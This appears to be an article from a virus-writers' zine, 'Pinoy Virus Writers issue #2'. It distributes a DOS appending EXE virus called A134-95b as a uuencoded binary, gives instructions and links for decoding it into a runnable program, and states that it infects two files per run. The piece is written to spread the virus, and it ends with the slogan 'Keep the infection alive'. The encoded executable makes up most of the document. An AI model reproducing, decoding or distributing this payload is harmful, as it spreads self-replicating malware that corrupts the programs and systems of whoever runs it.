ÄÄÄÄÄÄÄÄ [ PVW2.005 ] ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

    ***************************************************************
                An Example of an Appending Virus
                           - Zoom23
    ***************************************************************

þ Virus Name : A134-95b
þ Author : Zoom23
þ URL   : Http://members.xoom.com/Zoom23/virii.htm
þ Notes : Appending EXE file non-resident run-time virus .
          Infects 2 files in current directory .
þ Covert to an executable with UUdecode.com
þ If you don't have UUdecode.com you can downloadit from here :

    http://members.xoom.com/Zoom23/uudecode.com
    http://memebers.tripod.com/~brianjan/uudecode

======================= Cut here =============================

begin 644 a134-95b.exe
M35J``0@`&``(`$0%1*4T`@!```#G`0``'````!@````=````*P```$(```!K
M````>0```(<```">````J````,P```#O````!@$``.H!`````@``&@(``!\"
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
M`````````````````````````````/__````````````````````````````
M````````````````````````````````$$```*``L`"X```"``T*````````
(````````````
`
end
========================= cut here =========================


" Keep the infection alive ... "

                                          -Zoom23


   * ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ [ Pinoy Virus Writers isuue #2 ] ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ *

